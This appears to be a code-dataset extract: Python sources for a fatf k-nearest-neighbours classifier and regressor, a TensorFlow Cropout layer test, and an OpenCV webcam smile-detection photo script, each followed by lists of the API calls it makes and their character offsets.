_unique_y_counts : numpy.ndarray
An array with counts of the unique labels in the training labels set.
_unique_y_probabilities : numpy.ndarray
Probabilities of labels calculated using their frequencies in the
training data.
_majority_label : Union[string, integer, float]
The most common label in the training set.
_is_structured : boolean
A Boolean variable indicating whether the model has been fitted on a
structured numpy array.
_categorical_indices : numpy.ndarray
An array with categorical indices in the training array.
_numerical_indices : numpy.ndarray
An array with numerical indices in the training array.
"""
# pylint: disable=too-many-instance-attributes
_MODES = set(['classifier', 'c', 'regressor', 'r'])
def __init__(self, k: int = 3, mode: Optional[str] = None) -> None:
"""
Initialises the KNN model with the selected ``k`` parameter.
"""
super().__init__()
if not isinstance(k, int):
raise TypeError('The k parameter has to be an integer.')
if k < 0:
raise ValueError('The k parameter has to be a positive integer.')
if mode is None:
self._is_classifier = True
else:
if mode in self._MODES:
self._is_classifier = mode[0] == 'c'
else:
raise ValueError(('The mode parameter has to have one of the '
'following values {}.').format(self._MODES))
self._k = k
self._is_fitted = False
self._X = np.ndarray((0, 0)) # pylint: disable=invalid-name
self._y = np.ndarray((0, ))
self._X_n = int() # pylint: disable=invalid-name
self._unique_y = np.ndarray((0, ))
self._unique_y_counts = np.ndarray((0, ))
self._unique_y_probabilities = np.ndarray((0, ))
self._majority_label = None
self._is_structured = False
self._categorical_indices = np.ndarray((0, ))
self._numerical_indices = np.ndarray((0, ))
def fit(self, X: np.ndarray, y: np.ndarray) -> None:
"""
Fits the model.
Parameters
----------
X : numpy.ndarray
The KNN training data.
y : numpy.ndarray
The KNN training labels.
Raises
------
IncorrectShapeError
Either the ``X`` array is not 2-dimensional, the ``y`` array is not
1-dimensional, the number of rows in ``X`` is not the same as the
number of elements in ``y`` or the ``X`` array has 0 rows or 0
columns.
PrefittedModelError
Trying to fit the model when it has already been fitted. Usually
raised when calling the ``fit`` method for the second time without
clearing the model first.
TypeError
Trying to fit a KNN predictor in a regressor mode with
non-numerical target variable.
"""
if self._is_fitted:
raise PrefittedModelError('This model has already been fitted.')
if not fuav.is_2d_array(X):
raise IncorrectShapeError('The training data must be a 2-'
'dimensional array.')
if not fuav.is_1d_array(y):
raise IncorrectShapeError('The training data labels must be a 1-'
'dimensional array.')
if X.shape[0] == 0:
raise IncorrectShapeError('The data array has to have at least '
'one data point.')
# If the array is structured the fuav.is_2d_array function takes care
# of checking whether there is at least one column
if not fuav.is_structured_array(X) and X.shape[1] == 0:
raise IncorrectShapeError('The data array has to have at least '
'one feature.')
if X.shape[0] != y.shape[0]:
raise IncorrectShapeError('The number of samples in X must be the '
'same as the number of labels in y.')
if not self._is_classifier and not fuav.is_numerical_array(y):
raise TypeError('Regressor can only be fitted for a numerical '
'target vector.')
numerical_indices, categorical_indices = fuat.indices_by_type(X)
self._numerical_indices = numerical_indices
self._categorical_indices = categorical_indices
self._is_structured = fuav.is_structured_array(X)
self._X = X
self._y = y
if self._is_classifier:
unique_y, unique_y_counts = np.unique(self._y, return_counts=True)
# Order labels lexicographically.
unique_y_sort_index = np.argsort(unique_y)
self._unique_y = unique_y[unique_y_sort_index]
self._unique_y_counts = unique_y_counts[unique_y_sort_index]
# How many other labels have the same count.
top_y_index = self._unique_y_counts == np.max(
self._unique_y_counts)
top_y_unique_sorted = np.sort(self._unique_y[top_y_index])
self._majority_label = top_y_unique_sorted[0]
self._unique_y_probabilities = (
self._unique_y_counts / self._y.shape[0])
else:
self._majority_label = self._y.mean()
self._unique_y = np.ndarray((0, ))
self._unique_y_counts = np.ndarray((0, ))
self._unique_y_probabilities = np.ndarray((0, ))
self._X_n = self._X.shape[0]
self._is_fitted = True
def clear(self) -> None:
"""
Clears (unfits) the model.
Raises
------
UnfittedModelError
Raised when trying to clear a model that has not been fitted yet.
Try using the fit method to ``fit`` the model first.
"""
if not self._is_fitted:
raise UnfittedModelError('This model has not been fitted yet.')
self._is_fitted = False
self._X = np.ndarray((0, 0))
self._y = np.ndarray((0, ))
self._X_n = int()
self._unique_y = np.ndarray((0, ))
self._unique_y_counts = np.ndarray((0, ))
self._unique_y_probabilities = np.ndarray((0, ))
self._majority_label = None
self._is_structured = False
self._categorical_indices = np.ndarray((0, ))
self._numerical_indices = np.ndarray((0, ))
def _get_distances(self, X: np.ndarray) -> np.ndarray:
"""
Gets distances for a mixture of numerical and categorical features.
For numerical columns the distance is calculated as the Euclidean
distance. For categorical columns (i.e. non-numerical, e.g. strings)
the distance is 0 when the value matches and 1 otherwise.
Parameters
----------
X : numpy.ndarray
A data array for which distances to the training data will be
calculated.
Raises
------
AssertionError
Raised when the model is not fitted, X is not a 2-dimensional
array or X's dtype is different than training data's dtype. It is
also raised when the distances matrix is not 2-dimensional.
Returns
-------
distances : numpy.ndarray
An array of distances between X and the training data.
"""
# pylint: disable=invalid-name
assert self._is_fitted, 'Cannot calculate distances on unfitted model.'
assert fuav.is_2d_array(X), 'X must be a 2-dimensional array.'
assert fuav.are_similar_dtype_arrays(X, self._X), \
'X must have the same dtype as the training data.'
distances_shape = (self._X.shape[0], X.shape[0])
categorical_distances = np.zeros(distances_shape)
numerical_distances = np.zeros(distances_shape)
if self._is_structured:
if self._categorical_indices.size:
categorical_distances = fud.binary_array_distance(
self._X[self._categorical_indices],
X[self._categorical_indices])
if self._numerical_indices.size:
numerical_distances = fud.euclidean_array_distance(
self._X[self._numerical_indices],
X[self._numerical_indices])
else:
if self._categorical_indices.size:
categorical_distances = fud.binary_array_distance(
self._X[:, self._categorical_indices],
X[:, self._categorical_indices])
if self._numerical_indices.size:
numerical_distances = fud.euclidean_array_distance(
self._X[:, self._numerical_indices],
X[:, self._numerical_indices])
assert categorical_distances.shape == numerical_distances.shape, \
'Different number of point-wise distances for these feature types.'
distances = categorical_distances + numerical_distances
assert fuav.is_2d_array(distances), 'Distances matrix must be 2D.'
return distances
def predict(self, X: np.ndarray) -> np.ndarray:
"""
Predicts labels of new instances with the fitted model.
Parameters
----------
X : numpy.ndarray
The data for which labels will be predicted.
Raises
------
IncorrectShapeError
X is not a 2-dimensional array, it has 0 rows or it has a different
number of columns than the training data.
UnfittedModelError
Raised when trying to predict data when the model has not been
fitted yet. Try using the ``fit`` method to fit the model first.
ValueError
X has a different dtype than the data used to fit the model.
Returns
-------
predictions : numpy.ndarray
Predicted class labels for each data point.
"""
# pylint: disable=too-many-locals,too-many-branches
if not self._is_fitted:
raise UnfittedModelError('This model has not been fitted yet.')
if not fuav.is_2d_array(X):
raise IncorrectShapeError('X must be a 2-dimensional array. If '
'you want to predict a single data '
'point please format it as a single row '
'in a 2-dimensional array.')
if not fuav.are_similar_dtype_arrays(X, self._X):
raise ValueError('X must have the same dtype as the training '
'data.')
if not X.shape[0]:
raise IncorrectShapeError('X must have at least one row.')
# No need to check for columns in a structured array -> this is handled
# by the dtype checker.
if not fuav.is_structured_array(X):
if X.shape[1] != self._X.shape[1]:
raise IncorrectShapeError(('X must have the same number of '
'columns as the training data '
'({}).').format(self._X.shape[1]))
predictions = np.empty((X.shape[0], ))
if self._k < self._X_n:
distances = self._get_distances(X)
# If there are 3 nearest neighbours within distances 1, 2 and 2 and
# k is set to 2, then argpartition will always take the first
# within distance 2.
knn = np.argpartition(distances, self._k, axis=0)
predictions = []
for column in knn.T:
close_labels = self._y[column[:self._k]]
if self._is_classifier:
values, counts = np.unique(
close_labels, return_counts=True)
# If there is a tie in the counts take into consideration
# the overall label count in the training data to resolve
# it.
top_label_index = counts == counts.max()
top_label_unique_sorted = np.sort(values[top_label_index])
assert len(top_label_unique_sorted.shape) == 1, \
'This should be a flat array.'
if top_label_unique_sorted.shape[0] > 1:
# Resolve the tie.
# Get count of these label for the training data.
labels_filter = np.array(
self._unique_y.shape[0] * [False])
for top_prediction in top_label_unique_sorted:
unique_y_filter = self._unique_y == top_prediction
np.logical_or(
labels_filter,
unique_y_filter,
out=labels_filter)
g_top_label = self._unique_y[labels_filter]
g_top_label_counts = (
self._unique_y_counts[labels_filter])
# What if any of the global labels have the same count?
g_top_label_index = g_top_label_counts == np.max(
g_top_label_counts)
g_top_label_sorted = np.sort(
g_top_label[g_top_label_index])
prediction = g_top_label_sorted[0]
else:
prediction = top_label_unique_sorted[0]
else:
prediction = close_labels.mean()
predictions.append(prediction)
predictions = np.array(predictions)
else:
predictions = np.array(X.shape[0] * [self._majority_label])
return predictions
def predict_proba(self, X: np.ndarray) -> np.ndarray:
"""
Calculates label probabilities for new instances with the fitted model.
Parameters
----------
X : numpy.ndarray
The data for which labels probabilities will be predicted.
Raises
------
IncorrectShapeError
X is not a 2-dimensional array, it has 0 rows or it has a different
number of columns than the training data.
UnfittedModelError
Raised when trying to predict data when the model has not been
fitted yet. Try using the ``fit`` method to fit the model first.
RuntimeError
Raised when trying to use this method when the predictor is
initialised as a regressor.
ValueError
X has a different dtype than the data used to fit the model.
Returns
-------
probabilities : numpy.ndarray
Probabilities of each instance belonging to every class. The labels
in the return array are ordered by lexicographic order.
"""
if not self._is_classifier:
raise RuntimeError('This functionality is not available for a '
'regressor.')
if not self._is_fitted:
raise UnfittedModelError('This model has not been fitted yet.')
if not fuav.is_2d_array(X):
raise IncorrectShapeError('X must be a 2-dimensional array. If '
'you want to predict a single data '
'point please format it as a single row '
'in a 2-dimensional array.')
if not fuav.are_similar_dtype_arrays(X, self._X):
raise ValueError('X must have the same dtype as the training '
'data.')
if not X.shape[0]:
raise IncorrectShapeError('X must have at least one row.')
# No need to check for columns in a structured array -> this is handled
# by the dtype checker.
if not fuav.is_structured_array(X):
if X.shape[1] != self._X.shape[1]:
raise IncorrectShapeError(('X must have the same number of '
'columns as the training data '
'({}).').format(self._X.shape[1]))
probabilities = np.empty((X.shape[0], self._unique_y.shape[0]))
if self._k < self._X_n:
distances = self._get_distances(X)
knn = np.argpartition(distances, self._k, axis=0)
probabilities = []
for column in knn.T:
close_labels = self._y[column[:self._k]]
values, counts = np.unique(close_labels, return_counts=True)
total_counts = np.sum(counts)
probs = np.zeros((self._unique_y.shape[0], ))
for i in range(values.shape[0]):
ind = np.where(self._unique_y == values[i])[0]
probs[ind] = counts[i] / total_counts
probabilities.append(probs)
probabilities = np.array(probabilities)
else:
probabilities = np.tile(self._unique_y_probabilities,
(X.shape[0], 1))
return probabilities
| [
"fatf.exceptions.IncorrectShapeError",
"fatf.exceptions.UnfittedModelError",
"fatf.utils.array.validation.is_structured_array",
"numpy.argsort",
"fatf.utils.array.validation.is_1d_array",
"numpy.array",
"fatf.utils.array.validation.is_2d_array",
"fatf.exceptions.PrefittedModelError",
"numpy.where",
... | [((6935, 6953), 'numpy.ndarray', 'np.ndarray', (['(0, 0)'], {}), '((0, 0))\n', (6945, 6953), True, 'import numpy as np\n'), ((7004, 7020), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7014, 7020), True, 'import numpy as np\n'), ((7105, 7121), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7115, 7121), True, 'import numpy as np\n'), ((7155, 7171), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7165, 7171), True, 'import numpy as np\n'), ((7212, 7228), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7222, 7228), True, 'import numpy as np\n'), ((7338, 7354), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7348, 7354), True, 'import numpy as np\n'), ((7390, 7406), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (7400, 7406), True, 'import numpy as np\n'), ((9716, 9739), 'fatf.utils.array.tools.indices_by_type', 'fuat.indices_by_type', (['X'], {}), '(X)\n', (9736, 9739), True, 'import fatf.utils.array.tools as fuat\n'), ((9879, 9906), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (9903, 9906), True, 'import fatf.utils.array.validation as fuav\n'), ((11425, 11443), 'numpy.ndarray', 'np.ndarray', (['(0, 0)'], {}), '((0, 0))\n', (11435, 11443), True, 'import numpy as np\n'), ((11462, 11478), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11472, 11478), True, 'import numpy as np\n'), ((11531, 11547), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11541, 11547), True, 'import numpy as np\n'), ((11581, 11597), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11591, 11597), True, 'import numpy as np\n'), ((11638, 11654), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11648, 11654), True, 'import numpy as np\n'), ((11764, 11780), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11774, 11780), True, 'import numpy as np\n'), ((11816, 11832), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (11826, 11832), True, 'import numpy as np\n'), ((12921, 12940), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (12937, 12940), True, 'import fatf.utils.array.validation as fuav\n'), ((12992, 13033), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (13021, 13033), True, 'import fatf.utils.array.validation as fuav\n'), ((13190, 13215), 'numpy.zeros', 'np.zeros', (['distances_shape'], {}), '(distances_shape)\n', (13198, 13215), True, 'import numpy as np\n'), ((13246, 13271), 'numpy.zeros', 'np.zeros', (['distances_shape'], {}), '(distances_shape)\n', (13254, 13271), True, 'import numpy as np\n'), ((14436, 14463), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['distances'], {}), '(distances)\n', (14452, 14463), True, 'import fatf.utils.array.validation as fuav\n'), ((16602, 16625), 'numpy.empty', 'np.empty', (['(X.shape[0],)'], {}), '((X.shape[0],))\n', (16610, 16625), True, 'import numpy as np\n'), ((21675, 21722), 'numpy.empty', 'np.empty', (['(X.shape[0], self._unique_y.shape[0])'], {}), '((X.shape[0], self._unique_y.shape[0]))\n', (21683, 21722), True, 'import numpy as np\n'), ((8386, 8444), 'fatf.exceptions.PrefittedModelError', 'PrefittedModelError', (['"""This model has already been fitted."""'], {}), "('This model has already been fitted.')\n", (8405, 8444), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((8460, 8479), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (8476, 8479), True, 'import fatf.utils.array.validation as fuav\n'), ((8499, 8570), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The training data must be a 2-dimensional array."""'], {}), "('The training data must be a 2-dimensional array.')\n", (8518, 8570), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((8627, 8646), 'fatf.utils.array.validation.is_1d_array', 'fuav.is_1d_array', (['y'], {}), '(y)\n', (8643, 8646), True, 'import fatf.utils.array.validation as fuav\n'), ((8666, 8744), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The training data labels must be a 1-dimensional array."""'], {}), "('The training data labels must be a 1-dimensional array.')\n", (8685, 8744), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((8832, 8906), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The data array has to have at least one data point."""'], {}), "('The data array has to have at least one data point.')\n", (8851, 8906), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((9167, 9238), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The data array has to have at least one feature."""'], {}), "('The data array has to have at least one feature.')\n", (9186, 9238), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((9335, 9441), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""The number of samples in X must be the same as the number of labels in y."""'], {}), "(\n 'The number of samples in X must be the same as the number of labels in y.'\n )\n", (9354, 9441), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((10020, 10058), 'numpy.unique', 'np.unique', (['self._y'], {'return_counts': '(True)'}), '(self._y, return_counts=True)\n', (10029, 10058), True, 'import numpy as np\n'), ((10139, 10159), 'numpy.argsort', 'np.argsort', (['unique_y'], {}), '(unique_y)\n', (10149, 10159), True, 'import numpy as np\n'), ((10482, 10518), 'numpy.sort', 'np.sort', (['self._unique_y[top_y_index]'], {}), '(self._unique_y[top_y_index])\n', (10489, 10518), True, 'import numpy as np\n'), ((10774, 10790), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10784, 10790), True, 'import numpy as np\n'), ((10828, 10844), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10838, 10844), True, 'import numpy as np\n'), ((10889, 10905), 'numpy.ndarray', 'np.ndarray', (['(0,)'], {}), '((0,))\n', (10899, 10905), True, 'import numpy as np\n'), ((11316, 11373), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (11334, 11373), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15484, 15541), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (15502, 15541), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15557, 15576), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (15573, 15576), True, 'import fatf.utils.array.validation as fuav\n'), ((15596, 15763), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array."""'], {}), "(\n 'X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array.'\n )\n", (15615, 15763), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((15892, 15933), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (15921, 15933), True, 'import fatf.utils.array.validation as fuav\n'), ((16093, 16145), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must have at least one row."""'], {}), "('X must have at least one row.')\n", (16112, 16145), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((16273, 16300), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (16297, 16300), True, 'import fatf.utils.array.validation as fuav\n'), ((16912, 16955), 'numpy.argpartition', 'np.argpartition', (['distances', 'self._k'], {'axis': '(0)'}), '(distances, self._k, axis=0)\n', (16927, 16955), True, 'import numpy as np\n'), ((19096, 19117), 'numpy.array', 'np.array', (['predictions'], {}), '(predictions)\n', (19104, 19117), True, 'import numpy as np\n'), ((19158, 19203), 'numpy.array', 'np.array', (['(X.shape[0] * [self._majority_label])'], {}), '(X.shape[0] * [self._majority_label])\n', (19166, 19203), True, 'import numpy as np\n'), ((20555, 20612), 'fatf.exceptions.UnfittedModelError', 'UnfittedModelError', (['"""This model has not been fitted yet."""'], {}), "('This model has not been fitted yet.')\n", (20573, 20612), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((20628, 20647), 'fatf.utils.array.validation.is_2d_array', 'fuav.is_2d_array', (['X'], {}), '(X)\n', (20644, 20647), True, 'import fatf.utils.array.validation as fuav\n'), ((20667, 20834), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array."""'], {}), "(\n 'X must be a 2-dimensional array. If you want to predict a single data point please format it as a single row in a 2-dimensional array.'\n )\n", (20686, 20834), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((20963, 21004), 'fatf.utils.array.validation.are_similar_dtype_arrays', 'fuav.are_similar_dtype_arrays', (['X', 'self._X'], {}), '(X, self._X)\n', (20992, 21004), True, 'import fatf.utils.array.validation as fuav\n'), ((21164, 21216), 'fatf.exceptions.IncorrectShapeError', 'IncorrectShapeError', (['"""X must have at least one row."""'], {}), "('X must have at least one row.')\n", (21183, 21216), False, 'from fatf.exceptions import IncorrectShapeError, PrefittedModelError, UnfittedModelError\n'), ((21344, 21371), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (21368, 21371), True, 'import fatf.utils.array.validation as fuav\n'), ((21821, 21864), 'numpy.argpartition', 'np.argpartition', (['distances', 'self._k'], {'axis': '(0)'}), '(distances, self._k, axis=0)\n', (21836, 21864), True, 'import numpy as np\n'), ((22417, 22440), 'numpy.array', 'np.array', (['probabilities'], {}), '(probabilities)\n', (22425, 22440), True, 'import numpy as np\n'), ((22483, 22537), 'numpy.tile', 'np.tile', (['self._unique_y_probabilities', '(X.shape[0], 1)'], {}), '(self._unique_y_probabilities, (X.shape[0], 1))\n', (22490, 22537), True, 'import numpy as np\n'), ((9100, 9127), 'fatf.utils.array.validation.is_structured_array', 'fuav.is_structured_array', (['X'], {}), '(X)\n', (9124, 9127), True, 'import fatf.utils.array.validation as fuav\n'), ((9516, 9542), 'fatf.utils.array.validation.is_numerical_array', 'fuav.is_numerical_array', (['y'], {}), '(y)\n', (9539, 9542), True, 'import fatf.utils.array.validation as fuav\n'), ((10401, 10430), 'numpy.max', 'np.max', (['self._unique_y_counts'], {}), '(self._unique_y_counts)\n', (10407, 10430), True, 'import numpy as np\n'), ((13392, 13488), 'fatf.utils.distances.binary_array_distance', 'fud.binary_array_distance', (['self._X[self._categorical_indices]', 'X[self._categorical_indices]'], {}), '(self._X[self._categorical_indices], X[self.\n _categorical_indices])\n', (13417, 13488), True, 'import fatf.utils.distances as fud\n'), ((13608, 13703), 'fatf.utils.distances.euclidean_array_distance', 'fud.euclidean_array_distance', (['self._X[self._numerical_indices]', 'X[self._numerical_indices]'], {}), '(self._X[self._numerical_indices], X[self.\n _numerical_indices])\n', (13636, 13703), True, 'import fatf.utils.distances as fud\n'), ((13841, 13943), 'fatf.utils.distances.binary_array_distance', 'fud.binary_array_distance', (['self._X[:, self._categorical_indices]', 'X[:, self._categorical_indices]'], {}), '(self._X[:, self._categorical_indices], X[:, self.\n _categorical_indices])\n', (13866, 13943), True, 'import fatf.utils.distances as fud\n'), ((14063, 14164), 'fatf.utils.distances.euclidean_array_distance', 'fud.euclidean_array_distance', (['self._X[:, self._numerical_indices]', 'X[:, self._numerical_indices]'], {}), '(self._X[:, self._numerical_indices], X[:, self\n ._numerical_indices])\n', (14091, 14164), True, 'import fatf.utils.distances as fud\n'), ((22019, 22062), 'numpy.unique', 'np.unique', (['close_labels'], {'return_counts': '(True)'}), '(close_labels, return_counts=True)\n', (22028, 22062), True, 'import numpy as np\n'), ((22094, 22108), 'numpy.sum', 'np.sum', (['counts'], {}), '(counts)\n', (22100, 22108), True, 'import numpy as np\n'), ((22133, 22169), 'numpy.zeros', 'np.zeros', (['(self._unique_y.shape[0],)'], {}), '((self._unique_y.shape[0],))\n', (22141, 22169), True, 'import numpy as np\n'), ((17152, 17195), 'numpy.unique', 'np.unique', (['close_labels'], {'return_counts': '(True)'}), '(close_labels, return_counts=True)\n', (17161, 17195), True, 'import numpy as np\n'), ((17510, 17542), 'numpy.sort', 'np.sort', (['values[top_label_index]'], {}), '(values[top_label_index])\n', (17517, 17542), True, 'import numpy as np\n'), ((17886, 17929), 'numpy.array', 'np.array', (['(self._unique_y.shape[0] * [False])'], {}), '(self._unique_y.shape[0] * [False])\n', (17894, 17929), True, 'import numpy as np\n'), ((18728, 18767), 'numpy.sort', 'np.sort', (['g_top_label[g_top_label_index]'], {}), '(g_top_label[g_top_label_index])\n', (18735, 18767), True, 'import numpy as np\n'), ((22246, 22283), 'numpy.where', 'np.where', (['(self._unique_y == values[i])'], {}), '(self._unique_y == values[i])\n', (22254, 22283), True, 'import numpy as np\n'), ((18137, 18201), 'numpy.logical_or', 'np.logical_or', (['labels_filter', 'unique_y_filter'], {'out': 'labels_filter'}), '(labels_filter, unique_y_filter, out=labels_filter)\n', (18150, 18201), True, 'import numpy as np\n'), ((18627, 18653), 'numpy.max', 'np.max', (['g_top_label_counts'], {}), '(g_top_label_counts)\n', (18633, 18653), True, 'import numpy as np\n')] |
import tensorflow as tf
from noise import cropout
class CropoutTest(tf.test.TestCase):
def setUp(self):
self.layer = cropout.Cropout()
def testCropProportions(self):
shapes = [(1, 28, 28, 1), (2, 28, 28, 1),
(1, 28, 28, 3), (2, 28, 28, 3),
(2, 33, 33, 3)]
props = [0.0, 0.25, 0.5, 0.75, 1.0]
with self.cached_session(use_gpu=False):
for shape in shapes:
inputs = tf.ones(shape)
backgrounds = tf.zeros(shape)
for prop in props:
res = self.layer((inputs, backgrounds), prop)
crop_width = tf.cast(
tf.sqrt((shape[1] * shape[2] * prop)), tf.int32)
expected = tf.cast((
crop_width * crop_width * shape[3] * shape[0]),
tf.float32)
actual = tf.reduce_sum(res)
self.assertEqual(actual, expected)
| [
"tensorflow.ones",
"tensorflow.reduce_sum",
"tensorflow.sqrt",
"noise.cropout.Cropout",
"tensorflow.cast",
"tensorflow.zeros"
] | [((133, 150), 'noise.cropout.Cropout', 'cropout.Cropout', ([], {}), '()\n', (148, 150), False, 'from noise import cropout\n'), ((475, 489), 'tensorflow.ones', 'tf.ones', (['shape'], {}), '(shape)\n', (482, 489), True, 'import tensorflow as tf\n'), ((520, 535), 'tensorflow.zeros', 'tf.zeros', (['shape'], {}), '(shape)\n', (528, 535), True, 'import tensorflow as tf\n'), ((784, 850), 'tensorflow.cast', 'tf.cast', (['(crop_width * crop_width * shape[3] * shape[0])', 'tf.float32'], {}), '(crop_width * crop_width * shape[3] * shape[0], tf.float32)\n', (791, 850), True, 'import tensorflow as tf\n'), ((931, 949), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['res'], {}), '(res)\n', (944, 949), True, 'import tensorflow as tf\n'), ((704, 739), 'tensorflow.sqrt', 'tf.sqrt', (['(shape[1] * shape[2] * prop)'], {}), '(shape[1] * shape[2] * prop)\n', (711, 739), True, 'import tensorflow as tf\n')] |
import cv2
import numpy as np
import sys
import haar_cascade as cascade
from datetime import datetime
import os.path
output_dir = "../images"
class SmileDetectStatus:
def __init__(self):
self.begin_take_photo = False
self.face_found = False
self.smile_detected = False
self.restart = False
self.completed = False
self.photo_taken = False
self.splash_screen = 0
self.no_smile_detect = 0
self.smile_detect = 0
class Image:
def __init__(self, cap):
self.cap = cap
def capture_image(self):
ret, img = self.cap.read()
self.captured = cv2.flip(img, 1)
self.annotated = np.copy(self.captured)
class Detector:
def __init__(self, image, status):
self.image = image
self.status = status
def detect_smiles(self):
faces = cascade.detect_faces(self.image.captured)
eyes_detected = False
mouth_detected = False
now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
for (x,y,w,h) in faces:
eyes = cascade.detect_eyes(self.image.captured, (x,y,w,h))
if len(eyes) == 2:
eyes_detected = True
mouth = cascade.detect_mouth(self.image.captured, (x,y,w,h))
if len(mouth) == 1:
mouth_detected = True
if self.status.smile_detected:
color = (0, 255, 0)
elif self.status.face_found:
color = (0, 255, 255)
else:
color = (0,0,255)
face = self.image.annotated[y:y+h, x:x+w]
cv2.rectangle(self.image.annotated, (x, y), (x+w,y+h), color, 2)
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(face, (ex,ey), (ex+ew, ey+eh), color)
for (ex, ey, ew, eh) in mouth:
cv2.rectangle(face, (ex,ey), (ex+ew, ey+eh), color)
if self.status.begin_take_photo and not self.status.photo_taken:
print('Taking image')
cv2.imwrite(f'{output_dir}/img_{now_str}.jpg', self.image.captured)
self.status.photo_taken = True
if self.status.photo_taken:
self.image.annotated[:] = 255
self.status.splash_screen += 1
if self.status.splash_screen > 5:
self.status.completed = True
self.status.restart = True
if eyes_detected and mouth_detected and not self.status.photo_taken:
self.status.smile_detect += 1
self.status.no_smile_detect = 0
if self.status.smile_detect >= 25:
self.status.face_found = True
if self.status.smile_detect >= 50:
self.status.smile_detected = True
if self.status.smile_detect >= 100:
print("Smile detected")
self.status.begin_take_photo = True
else:
self.status.no_smile_detect += 1
if self.status.no_smile_detect == 20:
print("No smile was detected")
if self.status.no_smile_detect > 50:
self.status.restart = True
if not self.status.begin_take_photo or len(faces) == 0 or self.status.photo_taken:
cv2.imshow('Smile detector :)', self.image.annotated)
if cv2.waitKey(1) & 0xFF == ord('q'):
self.image.cap.release()
cv2.destroyAllWindows()
sys.exit()
def main():
if not os.path.exists(output_dir):
os.makedirs(output_dir)
cap = cv2.VideoCapture(0)
while True:
status = SmileDetectStatus()
while not status.begin_take_photo:
status = SmileDetectStatus()
image = Image(cap)
detector = Detector(image, status)
while not status.smile_detected:
image.capture_image()
detector.detect_smiles()
if status.restart:
print("Restarting...")
break
while status.smile_detected and not status.begin_take_photo:
image.capture_image()
detector.detect_smiles()
if status.restart:
print("Restarting...")
break
while not status.completed:
image.capture_image()
detector.detect_smiles()
if status.restart:
print("Restarting...")
break
if __name__ == '__main__':
main()
| [
"cv2.rectangle",
"numpy.copy",
"cv2.imwrite",
"cv2.flip",
"cv2.imshow",
"haar_cascade.detect_faces",
"datetime.datetime.now",
"cv2.destroyAllWindows",
"cv2.VideoCapture",
"sys.exit",
"haar_cascade.detect_mouth",
"cv2.waitKey",
"haar_cascade.detect_eyes"
